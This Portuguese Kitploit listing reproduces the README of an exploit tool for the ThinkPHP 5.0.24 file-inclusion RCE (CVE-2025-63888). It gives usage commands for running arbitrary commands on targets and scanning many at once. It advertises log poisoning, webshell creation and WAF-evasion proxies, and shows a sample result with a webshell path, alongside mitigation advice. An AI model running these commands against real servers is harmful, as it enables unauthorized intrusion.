Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2025-63888-exploit — Ferramenta de pesquisa de segurança para detectar e testar a vulnerabilidade CVE-2025-63888 (Inclusão de Arquivo RCE no ThinkPHP 5.0.24) | Kitploit
Ferramentas/GitHubGitHub/an5i/cve-2025-63888-exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed TeamingDesenvolvimento de Payloads
GitHuban5i/cve-2025-63888-exploit

cve-2025-63888-exploit

Ferramenta de pesquisa de segurança para detectar e testar a vulnerabilidade CVE-2025-63888 (Inclusão de Arquivo RCE no ThinkPHP 5.0.24)

Ver Repositório
10454há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-63888 ThinkPHP 5.0.24 Inclusão de Arquivo RCE Exploit

Uma ferramenta de pesquisa de segurança para detectar e testar a vulnerabilidade CVE-2025-63888 no ThinkPHP 5.0.24, que permite Execução Remota de Código através de ataques de inclusão de arquivos.

⚠️ Aviso Legal

Esta ferramenta destina-se apenas a testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal. Use esta ferramenta apenas em sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar.

📋 Visão Geral

CVE-2025-63888 é uma vulnerabilidade crítica de Execução Remota de Código no ThinkPHP 5.0.24. A vulnerabilidade existe na função read localizada em thinkphp/library/think/template/driver/File.php, permitindo que atacantes executem código arbitrário através de ataques de inclusão de arquivos manipulando o caminho do template na função view().

Pontuação CVSS: 9.8 (Crítica)
Versão Afetada: ThinkPHP 5.0.24 (versão exata)
Arquivo Vulnerável: thinkphp/library/think/template/driver/File.php
Função Vulnerável: Método read()

🔍 Funcionalidades

  • Detecção Automática de ThinkPHP: Identifica instalações e versões do ThinkPHP
  • Teste de Vulnerabilidade: Testa a vulnerabilidade de inclusão de arquivo CVE-2025-63888
  • Descoberta de Endpoints: Encontra automaticamente endpoints vulneráveis
  • Exploração de Inclusão de Arquivo: Demonstra a capacidade de inclusão de arquivo
  • Envenenamento de Log: Tenta envenenar arquivos de log para RCE
  • Criação de Webshell: Cria webshells via inclusão de arquivo
  • Execução de Comandos: Executa comandos arbitrários (para testes autorizados)
  • Suporte a Multithreading: Varre vários alvos em paralelo
  • Suporte a Proxy: Ignora restrições de WAF/Cloudflare
  • Exportação JSON: Resultados detalhados em formato JSON

📦 Instalação

Pré-requisitos

  • Python 3.6 ou superior
  • pip (gerenciador de pacotes Python)

Instalação Rápida

# Clone o repositório
git clone https://github.com/AN5I/cve-2025-63888-exploit.git
cd cve-2025-63888-exploit

# Instale as dependências
pip install -r requirements.txt

# Torne o script executável (opcional)
chmod +x cve_2025_63888_exploit.py

Alternativa: Download Direto

# Baixe o script
wget https://raw.githubusercontent.com/AN5I/cve-2025-63888-exploit/main/cve_2025_63888_exploit.py

# Instale as dependências
pip install requests

🚀 Uso

Uso Básico

# Alvo único
python3 cve_2025_63888_exploit.py -u http://target.com

# Executar comando personalizado
python3 cve_2025_63888_exploit.py -u http://target.com -c "whoami"

# Múltiplos alvos a partir de arquivo
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json

# Com threading para varredura mais rápida
python3 cve_2025_63888_exploit.py -u http://target.com -t 5

# Saída detalhada para depuração
python3 cve_2025_63888_exploit.py -u http://target.com -v

Usando Proxies

# Proxy único
python3 cve_2025_63888_exploit.py -u http://target.com --proxy http://proxy:port

# Múltiplos proxies a partir de arquivo
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt

Opções da Linha de Comando

-u, --url          URL do alvo
-f, --file         Arquivo contendo URLs dos alvos (um por linha)
-c, --command      Comando a executar (padrão: id)
-t, --threads      Número de threads (padrão: 1)
-o, --output       Arquivo de saída (padrão: uknf_results.json)
-v, --verbose      Ativar log detalhado
--proxy            URL do proxy (ex: http://127.0.0.1:8080)
--proxy-list       Arquivo contendo URLs de proxy (um por linha)

📊 Saída

O script gera um arquivo JSON com resultados detalhados:

{
  "target": "http://target.com",
  "timestamp": "2025-11-20T15:05:35.763409",
  "vulnerable": true,
  "endpoint_found": true,
  "exploitation_successful": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_endpoint": "/index.php/index/index/view",
  "webshell_created": true,
  "webshell_path": "../../../runtime/log/2025/11/18.log"
}

🔬 Como Funciona

  1. Fase de Detecção: Varre por indicadores do framework ThinkPHP
  2. Detecção de Versão: Tenta identificar a versão do ThinkPHP (5.0.24)
  3. Teste de Vulnerabilidade: Testa a vulnerabilidade de inclusão de arquivo
  4. Descoberta de Endpoints: Encontra endpoints vulneráveis usando a função view()
  5. Exploração: Demonstra capacidade de RCE através de inclusão de arquivo

🛡️ Mitigação

Se você está usando ThinkPHP 5.0.24:

  1. Atualize imediatamente:

    • Atualize para ThinkPHP 5.0.25+ ou posterior
    • Ou atualize para ThinkPHP 6.x/7.x
  2. Implemente validação de caminho:

    • Adicione validação rigorosa de caminho na função view()
    • Bloqueie caracteres de travessia de diretório (../, ..)
    • Restrinja caminhos de template a diretórios permitidos
  3. Correções em nível de código:

    • Valide caminhos de template antes do processamento
    • Use realpath() para garantir que os arquivos estejam dentro de diretórios permitidos
    • Implemente uma lista de permissões de funções

📚 Referências

  • CVE: CVE-2025-63888
  • GitHub Gist: Detalhes do CVE-2025-63888
  • Artigo no Yuque: Análise Detalhada
  • Manual do ThinkPHP: Documentação Oficial

📖 Exemplos

Exemplo 1: Varredura de Alvo Único

python3 cve_2025_63888_exploit.py -u https://example.com

Exemplo 2: Múltiplos Alvos com Saída

# Crie o arquivo de alvos
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Execute a varredura
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json

Exemplo 3: Execução de Comando Personalizado

python3 cve_2025_63888_exploit.py -u https://example.com -c "uname -a"

Exemplo 4: Usando Proxies

# Proxy único
python3 cve_2025_63888_exploit.py -u https://example.com --proxy http://127.0.0.1:8080

# Múltiplos proxies a partir de arquivo
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt

🤝 Contribuindo

Contribuições são bem-vindas! Sinta-se à vontade para enviar um Pull Request.

  1. Faça um fork do repositório
  2. Crie sua branch de funcionalidade (git checkout -b feature/AmazingFeature)
  3. Commit suas alterações (git commit -m 'Adiciona alguma AmazingFeature')
  4. Envie para a branch (git push origin feature/AmazingFeature)
  5. Abra um Pull Request

🐛 Problemas

Se você encontrar algum problema ou tiver sugestões, por favor abra uma issue no GitHub.

📝 Licença

Este projeto está licenciado sob a Licença MIT - veja o arquivo LICENSE para detalhes.

⭐ Histórico de Estrelas

Se você achar esta ferramenta útil, considere dar uma estrela no GitHub!

⚖️ Legal

Esta ferramenta é fornecida apenas para fins educacionais e de teste de segurança autorizado. Os autores não são responsáveis por qualquer uso indevido ou dano causado por este programa. Os usuários são responsáveis por garantir que possuem a devida autorização antes de testar qualquer sistema.

🙏 Agradecimentos

  • Relator original da vulnerabilidade: Master-0-0
  • Comunidade de segurança do ThinkPHP
  • Pesquisadores de segurança que contribuíram para a análise da vulnerabilidade

💰 Doações

Se você achar esta ferramenta útil e quiser apoiar o projeto:

Bitcoin (BTC):

bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

Ethereum (ETH):

0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7
Baixar ferramenta